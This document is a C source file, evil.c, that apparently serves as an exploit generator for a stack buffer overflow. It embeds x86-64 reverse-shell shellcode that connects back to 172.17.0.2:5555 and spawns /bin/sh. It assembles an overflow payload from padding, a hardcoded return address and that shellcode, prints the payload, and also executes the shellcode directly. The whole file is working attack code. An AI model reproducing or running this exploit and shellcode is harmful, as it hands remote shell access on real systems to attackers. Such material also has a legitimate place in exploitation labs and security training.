evil.c

#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// From: http://shell-storm.org/shellcode/files/shellcode-857.php


// For repeatability, always use the same length overflow
#define PAD_LEN 17
#define RET_ADDRESS (0x7fffffffe6d8+8+64-0xf0)
#define OVERFLOW_LEN 500
#define BASE64_SIZE(s) (((s)/3+1)*4)
#define BASE256_SIZE(s) (((s)/4-1)*3)

#define IPADDR "\xac\x11\x00\x02" /* 172.17.0.2 */
#define PORT "\x15\xb3" /* 5555 */

unsigned char reverse_shell[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
"\x02"PORT"\xc7\x44\x24\x04"IPADDR"\x48\x89\xe6\x6a\x10"
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";

static unsigned char *asPayload(unsigned char *s)
{
    int l = strlen((char *) s);
    unsigned char *pl = (unsigned char *) malloc(BASE256_SIZE(OVERFLOW_LEN)+1);
    unsigned char *pli = pl;
    unsigned long r = (unsigned long) RET_ADDRESS;

    for (int i = 0; i < PAD_LEN; i++)
        pli += sprintf((char *)pli, "a");

    for (int i = 0; i < sizeof(r); i++, r >>= 8)
    {
	unsigned char c = (unsigned char) (r & 0xFF);
        pli += sprintf((char *) pli, "%c", c);
    }
    pli += sprintf((char *)pli, "%s", s);
    for (int i = 0, n = BASE256_SIZE(OVERFLOW_LEN)-(unsigned int)(pli - pl); i < n; i++)
        pli += sprintf((char *)pli, "b");

    *pli++ = '\0';

    assert((pli - pl ) == BASE256_SIZE(OVERFLOW_LEN)+1);

    return pl;
}

int main(void)
{
    unsigned char *sPayload = asPayload(reverse_shell);
    for (int i = 0; i < BASE256_SIZE(OVERFLOW_LEN)+1; i++)
        printf("%c", (char) sPayload[i]);
    fflush(stdout);

    ((void(*)(void))reverse_shell)();

    return 0;
}